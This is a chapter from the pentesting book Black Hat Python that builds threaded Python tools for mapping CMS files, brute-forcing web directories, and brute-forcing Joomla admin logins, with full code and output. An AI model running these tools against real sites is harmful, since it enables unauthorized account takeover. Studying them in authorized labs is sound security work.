Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 5. Web Hackery

Analyzing web applications is absolutely critical for an attacker or penetration tester. In most modern networks, web applications present the largest attack surface and so are also the most common avenue for gaining access. There are a number of excellent web application tools that have been written in Python, including w3af, sqlmap, and others. Quite frankly, topics such as SQL injection have been beaten to death, and the tooling available is mature enough that we don’t need to reinvent the wheel. Instead, we’ll explore the basics of interacting with the Web using Python, and then build on this knowledge to create reconnaissance and brute-force tooling. You’ll see how HTML parsing can be useful in creating brute forcers, recon tooling, and mining text-heavy sites. The idea is to create a few different tools to give you the fundamental skills you need to build any type of web application assessment tool that your particular attack scenario calls for.

The Socket Library of the Web: urllib2

Much like writing network tooling with the socket library, when you’re creating tools to interact with web services, you’ll use the urllib2 library. Let’s take a look at making a very simple GET request to the No Starch Press website:

import urllib2

➊ body = urllib2.urlopen("http://www.nostarch.com")

➋ print body.read()

This is the simplest example of how to make a GET request to a website. Be mindful that we are just fetching the raw page from the No Starch website, and that no JavaScript or other client-side languages will execute. We simply pass in a URL to the urlopen function ➊ and it returns a file-like object that allows us to read back ➋ the body of what the remote web server returns. In most cases, however, you are going to want finer-grained control over how you make these requests, including being able to define specific headers, handle cookies, and create POST requests. urllib2 exposes a Request class that gives you this level of control. Below is an example of how to create the same GET request using the Request class and defining a custom User-Agent HTTP header:

import urllib2

url = "http://www.nostarch.com"

➊ headers = {}

headers['User-Agent'] = "Googlebot"

➋ request = urllib2.Request(url,headers=headers)

➌ response = urllib2.urlopen(request)

print response.read()


The construction of a Request object is slightly different than our previous example. To create custom headers, you define a headers dictionary ➊, which allows you to then set the header key and value that you want to use. In this case, we’re going to make our Python script appear to be the Googlebot. We then create our Request object and pass in the url and the headers dictionary ➋, and then pass the Request object to the urlopen function call ➌. This returns a normal file-like object that we can use to read in the data from the remote website.
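If you are working in Python 3, urllib2 no longer exists; its functionality was merged into urllib.request. As a point of reference only, a minimal sketch of the same custom-header GET request looks like this (the urlopen call is left commented out so nothing touches the network):

```python
# Python 3 sketch of the same custom-header GET request;
# urllib2's functionality lives in urllib.request in Python 3.
import urllib.request

url = "http://www.nostarch.com"

headers = {"User-Agent": "Googlebot"}
request = urllib.request.Request(url, headers=headers)

# the header is attached to the Request object before any network I/O
# happens (urllib normalizes header-key capitalization internally)
print(request.get_header("User-agent"))  # prints "Googlebot"

# response = urllib.request.urlopen(request)
# print(response.read())
```

The rest of this chapter sticks with the Python 2 urllib2 API that the scripts are written against.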

We now have the fundamental means to talk to web services and websites, so let’s create some useful tooling for any web application attack or penetration test.

Mapping Open Source Web App Installations

Content management systems and blogging platforms such as Joomla, WordPress, and Drupal make starting a new blog or website simple, and they’re relatively common in a shared hosting environment or even an enterprise network. All systems have their own challenges in terms of installation, configuration, and patch management, and these CMS suites are no exception. When an overworked sysadmin or a hapless web developer doesn’t follow all security and installation procedures, it can be easy pickings for an attacker to gain access to the web server.

Because we can download any open source web application and locally determine its file and directory structure, we can create a purpose-built scanner that can hunt for all files that are reachable on the remote target. This can root out leftover installation files, directories that should be protected by .htaccess files, and other goodies that can assist an attacker in getting a toehold on the web server. This project also introduces you to using Python Queue objects, which allow us to build a large, thread-safe stack of items and have multiple threads pick items for processing. This will allow our scanner to run very rapidly. Let’s open web_app_mapper.py and enter the following code:

import Queue
import threading
import os
import urllib2

threads = 10

➊ target = "http://www.blackhatpython.com"
directory = "/Users/justin/Downloads/joomla-3.1.1"
filters = [".jpg", ".gif", ".png", ".css"]

os.chdir(directory)

➋ web_paths = Queue.Queue()

➌ for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
➍     while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)
        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

➎             print "[%d] => %s" % (response.code, path)
            response.close()

➏         except urllib2.HTTPError as error:
            #print "Failed %s" % error.code
            pass

➐ for i in range(threads):
    print "Spawning thread: %d" % i
    t = threading.Thread(target=test_remote)
    t.start()

We begin by defining the remote target website ➊ and the local directory into which we have downloaded and extracted the web application. We also create a simple list of file extensions that we are not interested in fingerprinting. This list can be different depending on the target application. The web_paths ➋ variable is our Queue object where we will store the files that we’ll attempt to locate on the remote server. We then use the os.walk ➌ function to walk through all of the files and directories in the local web application directory. As we walk through the files and directories, we’re building the full path to the target files and testing them against our filter list to make sure we are only looking for the file types we want. For each valid file we find locally, we add it to our web_paths Queue.
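If you want to see the walk-and-filter step in isolation, here is a sketch of the same logic as a standalone Python 3 function (queue replaces the Python 2 Queue module; build_path_queue and local_root are names invented for this example):

```python
# Standalone Python 3 sketch of the walk-and-filter logic: walk a local
# web application directory and queue up every interesting relative path.
import os
import queue

def build_path_queue(local_root, filters=(".jpg", ".gif", ".png", ".css")):
    web_paths = queue.Queue()
    for root, dirs, files in os.walk(local_root):
        for fname in files:
            # skip the file types we don't care about fingerprinting
            if os.path.splitext(fname)[1] in filters:
                continue
            full_path = os.path.join(root, fname)
            # convert the local path into a web path relative to the web root
            remote_path = "/" + os.path.relpath(full_path, local_root).replace(os.sep, "/")
            web_paths.put(remote_path)
    return web_paths
```

Pointing this at an extracted Joomla tree would queue paths like /administrator/index.php, ready to be requested against the remote target.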

Looking at the bottom of the script ➐, we create a number of threads (as set at the top of the file) that will each call the test_remote function. The test_remote function operates in a loop that keeps executing until the web_paths Queue is empty. On each iteration of the loop, we grab a path from the Queue ➍, add it to the target website’s base path, and then attempt to retrieve it. If we’re successful in retrieving the file, we output the HTTP status code and the full path to the file ➎. If the file is not found or is protected by an .htaccess file, urllib2 will throw an error, which we handle ➏ so the loop can continue executing.

Kicking the Tires

For testing purposes, I installed Joomla 3.1.1 into my Kali VM, but you can use any open source web application that you can quickly deploy or that you have running already. When you run web_app_mapper.py, you should see output like the following:

Spawning thread: 0

Spawning thread: 1

Spawning thread: 2

Spawning thread: 3

Spawning thread: 4

Spawning thread: 5

Spawning thread: 6

Spawning thread: 7

Spawning thread: 8

Spawning thread: 9

[200] => /htaccess.txt

[200] => /web.config.txt

[200] => /LICENSE.txt

[200] => /README.txt

[200] => /administrator/cache/index.html

[200] => /administrator/components/index.html

[200] => /administrator/components/com_admin/controller.php

[200] => /administrator/components/com_admin/script.php

[200] => /administrator/components/com_admin/admin.xml

[200] => /administrator/components/com_admin/admin.php

[200] => /administrator/components/com_admin/helpers/index.html

[200] => /administrator/components/com_admin/controllers/index.html

[200] => /administrator/components/com_admin/index.html

[200] => /administrator/components/com_admin/helpers/html/index.html

[200] => /administrator/components/com_admin/models/index.html

[200] => /administrator/components/com_admin/models/profile.php

[200] => /administrator/components/com_admin/controllers/profile.php

You can see that we are picking up some valid results including some .txt files and XML files. Of course, you can build additional intelligence into the script to only return files you’re interested in — such as those with the word install in them.

Brute-Forcing Directories and File Locations

The previous example assumed a lot of knowledge about your target. But in many cases where you’re attacking a custom web application or large e-commerce system, you won’t be aware of all of the files accessible on the web server. Generally, you’ll deploy a spider, such as the one included in Burp Suite, to crawl the target website in order to discover as much of the web application as possible. However, in a lot of cases there are configuration files, leftover development files, debugging scripts, and other security breadcrumbs that can provide sensitive information or expose functionality that the software developer did not intend. The only way to discover this content is to use a brute-forcing tool to hunt down common filenames and directories.

We’ll build a simple tool that will accept wordlists from common brute forcers such as the DirBuster project[10] or SVNDigger,[11] and attempt to discover directories and files that are reachable on the target web server. As before, we’ll create a pool of threads to aggressively attempt to discover content. Let’s start by creating some functionality to create a Queue out of a wordlist file. Open up a new file, name it content_bruter.py, and enter the following code:

import urllib2
import threading
import Queue
import urllib

threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

def build_wordlist(wordlist_file):

    # read in the word list
➊     fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

➋     for word in raw_words:
        word = word.rstrip()

        if resume is not None:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)

    return words

This helper function is pretty straightforward. We read in a wordlist file ➊ and then begin iterating over each line in the file ➋. We have some built-in functionality that allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down. This can be achieved by simply setting the resume variable to the last path that the brute forcer tried. When the entire file has been parsed, we return a Queue full of words to use in our actual brute-forcing function. We will reuse this function later in this chapter.
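The resume logic is easy to test in isolation. Here is a Python 3 sketch of the same skip-until-resume behavior (queue_words is a name invented for this example; the book’s build_wordlist reads the module-level resume variable instead of taking a parameter):

```python
# Python 3 sketch of the resume logic in build_wordlist: discard every
# word until we hit the saved resume point, then queue everything after it.
import queue

def queue_words(raw_words, resume=None):
    words = queue.Queue()
    found_resume = False
    for word in raw_words:
        word = word.rstrip()
        if resume is not None:
            if found_resume:
                words.put(word)
            elif word == resume:
                # the resume word itself was already tried; start after it
                found_resume = True
        else:
            words.put(word)
    return words
```

With resume set to "bbb" and a wordlist of aaa, bbb, ccc, ddd, only ccc and ddd end up in the queue.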

We want some basic functionality to be available to our brute-forcing script. The first is the ability to apply a list of extensions to test for when making requests. In some cases, you want to try not only the /admin directory, for example, but also admin.php, admin.inc, and admin.html.

def dir_bruter(word_queue, extensions=None):

    while not word_queue.empty():
        attempt = word_queue.get()

        attempt_list = []

        # check to see if there is a file extension; if not,
        # it's a directory path we're bruting
➊         if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
➋         if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))

            try:
                headers = {}
➌                 headers["User-Agent"] = user_agent
                r = urllib2.Request(url, headers=headers)

                response = urllib2.urlopen(r)

➍                 if len(response.read()):
                    print "[%d] => %s" % (response.code, url)

            except urllib2.URLError as e:
                if hasattr(e, 'code') and e.code != 404:
➎                     print "!!! %d => %s" % (e.code, url)
                pass


Our dir_bruter function accepts a Queue object that is populated with words to use for brute-forcing and an optional list of file extensions to test. We begin by testing to see if there is a file extension in the current word ➊, and if there isn’t, we treat it as a directory that we want to test for on the remote web server. If there is a list of file extensions passed in ➋, then we take the current word and apply each file extension that we want to test for. It can be useful here to think of using extensions like .orig and .bak on top of the regular programming language extensions. After we build a list of brute-forcing attempts, we set the User-Agent header to something innocuous ➌ and test the remote web server. If the response code is a 200, we output the URL ➍, and if we receive anything but a 404 we also output it ➎ because this could indicate something interesting on the remote web server aside from a “file not found” error.
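To make the path-permutation step concrete, here is the attempt-list logic pulled out into a standalone function (build_attempts is a hypothetical name; in the actual script this logic runs inline inside dir_bruter):

```python
# Standalone sketch of the attempt-list building inside dir_bruter:
# a bare word becomes a directory guess, and each extension is also
# bolted onto the word as a file guess.
def build_attempts(word, extensions=None):
    attempts = []
    if "." not in word:
        # no extension, so treat the word as a directory
        attempts.append("/%s/" % word)
    else:
        attempts.append("/%s" % word)
    # optionally try each extension on top of the bare word
    if extensions:
        for ext in extensions:
            attempts.append("/%s%s" % (word, ext))
    return attempts
```

For example, build_attempts("admin", [".php", ".bak"]) yields /admin/, /admin.php, and /admin.bak, while build_attempts("index.html") yields only /index.html.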

It’s useful to pay attention to and react to your output because, depending on the configuration of the remote web server, you may have to filter out more HTTP error codes in order to clean up your results. Let’s finish out the script by setting up our wordlist, creating a list of extensions, and spinning up the brute-forcing threads.

word_queue = build_wordlist(wordlist_file)
extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(word_queue, extensions,))
    t.start()


The code snippet above is pretty straightforward and should look familiar by now. We get our list of words to brute-force, create a simple list of file extensions to test for, and then spin up a bunch of threads to do the brute-forcing.

Kicking the Tires

OWASP has a list of online and offline (virtual machines, ISOs, etc.) vulnerable web applications that you can test your tooling against. In this case, the URL that is referenced in the source code points to an intentionally buggy web application hosted by Acunetix. The cool thing is that it shows you how effective brute-forcing a web application can be. I recommend you set the threads variable to something sane, such as 5, and run the script. In short order, you should start seeing results such as the ones below:

[200] => http://testphp.vulnweb.com/CVS/

[200] => http://testphp.vulnweb.com/admin/

[200] => http://testphp.vulnweb.com/index.bak

[200] => http://testphp.vulnweb.com/search.php

[200] => http://testphp.vulnweb.com/login.php

[200] => http://testphp.vulnweb.com/images/

[200] => http://testphp.vulnweb.com/index.php

[200] => http://testphp.vulnweb.com/logout.php

[200] => http://testphp.vulnweb.com/categories.php

You can see that we are pulling some interesting results from the remote website. I cannot stress enough the importance of performing content brute-forcing against all of your web application targets.

Brute-Forcing HTML Form Authentication

There may come a time in your web hacking career when you need to either gain access to a target or, if you’re consulting, assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of brute forcers that can brute-force a POST request to a login script, but in a lot of cases they are not flexible enough to deal with dynamic content or handle simple “are you human” checks. We’ll create a simple brute forcer that will be useful against Joomla, a popular content management system. Modern Joomla systems include some basic anti-brute-force techniques, but still lack account lockouts or strong captchas by default.

In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt and ensure that we accept cookies in our urllib2 session. In order to parse out the login form values, we’ll use the native Python class HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. Let’s get started by having a look at the Joomla administrator login form. This can be found by browsing to http://<yourtarget>.com/administrator/. For the sake of brevity, I’ve only included the relevant form elements.

<form action="/administrator/index.php" method="post" id="form-login">
    <input name="username" tabindex="1" id="mod-login-username" type="text"
        class="input-medium" placeholder="User Name" size="15"/>
    <input name="passwd" tabindex="2" id="mod-login-password" type="password"
        class="input-medium" placeholder="Password" size="15"/>
    <select id="lang" name="lang" class="inputbox advancedSelect">
        <option value="" selected="selected">Language - Default</option>
        <option value="en-GB">English (United Kingdom)</option>
    </select>
    <input type="hidden" name="option" value="com_login"/>
    <input type="hidden" name="task" value="login"/>
    <input type="hidden" name="return" value="aW5kZXgucGhw"/>
    <input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />
</form>

Reading through this form, we are privy to some valuable information that we’ll need to incorporate into our brute forcer. The first is that the form gets submitted to the /administrator/index.php path as an HTTP POST. The next is the set of fields required in order for the form submission to be successful. In particular, if you look at the last hidden field, you’ll see that its name attribute is set to a long, randomized string. This is the essential piece of Joomla’s anti-brute-forcing technique. That randomized string is checked against your current user session, which is stored in a cookie; even if you pass the correct credentials into the login processing script, the authentication will fail if the randomized token is not present. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:

1. Retrieve the login page, and accept all cookies that are returned.

2. Parse out all of the form elements from the HTML.

3. Set the username and/or password to a guess from our dictionary.

4. Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.

5. Test to see if we have successfully logged in to the web application.
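As a point of reference, the cookie plumbing in steps 1 and 4 translates to Python 3 as follows. This is only a sketch: http.cookiejar stands in for Python 2’s cookielib, and urllib.request for urllib2; the opener.open call is left commented out so nothing touches the network.

```python
# Python 3 sketch of a cookie-aware opener: every request made through
# this opener automatically stores and replays cookies, which is exactly
# what the Joomla login token check requires.
import http.cookiejar
import urllib.request

jar = http.cookiejar.CookieJar()  # in-memory jar; FileCookieJar can persist to disk
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

# response = opener.open("http://<yourtarget>.com/administrator/")
```

The scripts below use the equivalent Python 2 classes, cookielib.FileCookieJar and urllib2.build_opener.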

You can see that we are going to be utilizing some new and valuable techniques in this script. I will also mention that you should never “train” your tooling on a live target; always set up an installation of your target web application with known credentials and verify that you get the desired results. Let’s open a new Python file named joomla_killer.py and enter the following code:

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

# general settings

user_thread = 10

username = "admin"

wordlist_file = "/tmp/cain.txt"

resume = None

# target specific settings

➊ target_url = ""

target_post = ""

➋ username_field = "username"

password_field = "passwd"

➌ success_check = "Administration - Control Panel"

These general settings deserve a bit of explanation. The target_url variable ➊ is where our script will first download and parse the HTML. The target_post variable is where we will submit our brute-forcing attempt. Based on our brief analysis of the HTML in the Joomla login, we can set the username_field and password_field ➋ variables to the appropriate names of the HTML elements. Our success_check variable ➌ is a string that we’ll check for after each brute-forcing attempt in order to determine whether we are successful or not. Let’s now create the plumbing for our brute forcer; some of the following code will be familiar so I’ll only highlight the newest techniques.

class Bruter(object):
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False

        print "Finished setting up for: %s" % username

    def run_bruteforce(self):
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()

    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
➊             jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)
            page = response.read()

            print "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())

            # parse out the hidden fields
➋             parser = BruteParser()
            parser.feed(page)

            post_tags = parser.tag_results

            # add our username and password fields
➌             post_tags[username_field] = self.username
            post_tags[password_field] = brute

➍             login_data = urllib.urlencode(post_tags)

            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()

➎             if success_check in login_result:
                self.found = True

                print "[*] Bruteforce successful."
                print "[*] Username: %s" % username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."

This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies for us. After we grab our password attempt, we set up our cookie jar ➊ using the FileCookieJar class, which will store the cookies in the cookies file. Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We then make the initial request to retrieve the login form. When we have the raw HTML, we pass it off to our HTML parser and call its feed method ➋, which returns a dictionary of all of the retrieved form elements. After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt ➌. Next we URL-encode the POST variables ➍ and then pass them in our subsequent HTTP request. After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not ➎. Now let’s implement the core of our HTML processing. Add the following class to your joomla_killer.py script:

class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)

➊         self.tag_results = {}

    def handle_starttag(self, tag, attrs):
➋         if tag == "input":
            tag_name = None
            tag_value = None

            for name, value in attrs:
                if name == "name":
➌                     tag_name = value
                if name == "value":
➍                     tag_value = value

            if tag_name is not None:
➎                 self.tag_results[tag_name] = tag_value

This forms the specific HTML parsing class that we want to use against our target. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored ➊. When we call the feed function, it passes in the entire HTML document and our handle_starttag function is called whenever a tag is encountered. In particular, we’re looking for HTML input tags ➋ and our main processing occurs when we determine that we have found one. We begin iterating over the attributes of the tag, and if we find the name➌ or value ➍ attributes, we associate them in the tag_results dictionary ➎. After the HTML has been processed, our brute-forcing class can then replace the username and password fields while leaving the remainder of the fields intact.
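The same extraction technique works in Python 3, where HTMLParser lives in the html.parser module. Here is a sketch you can feed a form snippet to directly (FormParser is a name invented for this example; the logic mirrors BruteParser above):

```python
# Python 3 version of the input-tag extraction: feed it HTML and it
# collects every <input> name/value pair into a dictionary.
from html.parser import HTMLParser

class FormParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        # we only care about input tags
        if tag != "input":
            return
        tag_name = None
        tag_value = None
        for name, value in attrs:
            if name == "name":
                tag_name = value
            if name == "value":
                tag_value = value
        if tag_name is not None:
            self.tag_results[tag_name] = tag_value
```

Feeding the Joomla login form shown earlier to this parser would leave tag_results holding every input name, including the randomized token field.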


There are three primary methods you can implement when using the HTMLParser class: handle_starttag, handle_endtag, and handle_data. The handle_starttag function will be called any time an opening HTML tag is encountered, and the opposite is true for the handle_endtag function, which gets called each time a closing HTML tag is encountered. The handle_data function gets called when there is raw text in between tags. The function prototypes for each function are slightly different, as follows:

handle_starttag(self, tag, attributes)

handle_endtag(self, tag)

handle_data(self, data)

A quick example to highlight this:

<title>Python rocks!</title>

handle_starttag => tag variable would be "title"

handle_data => data variable would be "Python rocks!"

handle_endtag => tag variable would be "title"

With this very basic understanding of the HTMLParser class, you can do things like parse forms, find links for spidering, extract all of the pure text for data mining purposes, or find all of the images in a page.
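That walkthrough can be turned into a few lines of runnable code. This Python 3 sketch (TitleDemo is an invented name; Python 3 moves HTMLParser into html.parser) records each callback as it fires:

```python
# Demonstrates the three HTMLParser callbacks firing in order
# against the <title> snippet above.
from html.parser import HTMLParser

class TitleDemo(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag))

    def handle_data(self, data):
        self.events.append(("data", data))

    def handle_endtag(self, tag):
        self.events.append(("end", tag))

parser = TitleDemo()
parser.feed("<title>Python rocks!</title>")
print(parser.events)
```

Running this shows one start event for title, one data event carrying the text, and one end event, in that order.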

To wrap up our Joomla brute forcer, let’s copy-paste the build_wordlist function from our previous section and add the following code:

# paste the build_wordlist function here

words = build_wordlist(wordlist_file)

bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()


That’s it! We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.

Kicking the Tires

If you don’t have Joomla installed into your Kali VM, then you should install it now. My target VM is at and I am using a wordlist provided by Cain and Abel,[12] a popular brute-forcing and cracking toolset. I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works. I then added justin to the cain.txt wordlist file, about 50 entries down. When running the script, I get the following output:

$ python2.7 joomla_killer.py

Finished setting up for: admin

Trying: admin : 0racl38 (306697 left)

Trying: admin : !@#$% (306697 left)

Trying: admin : !@#$%^ (306697 left)


Trying: admin : 1p2o3i (306659 left)

Trying: admin : 1qw23e (306657 left)

Trying: admin : 1q2w3e (306656 left)

Trying: admin : 1sanjose (306655 left)

Trying: admin : 2 (306655 left)

Trying: admin : justin (306655 left)

Trying: admin : 2112 (306646 left)

[*] Bruteforce successful.

[*] Username: admin

[*] Password: justin

[*] Waiting for other threads to exit...

Trying: admin : 249 (306646 left)

Trying: admin : 2welcome (306646 left)

You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. After you test this locally and you’re certain it works, you can use this tool against a target Joomla installation of your choice.

[10] DirBuster Project: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

[11] SVNDigger Project: https://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/

[12] Cain and Abel: http://www.oxid.it/cain.html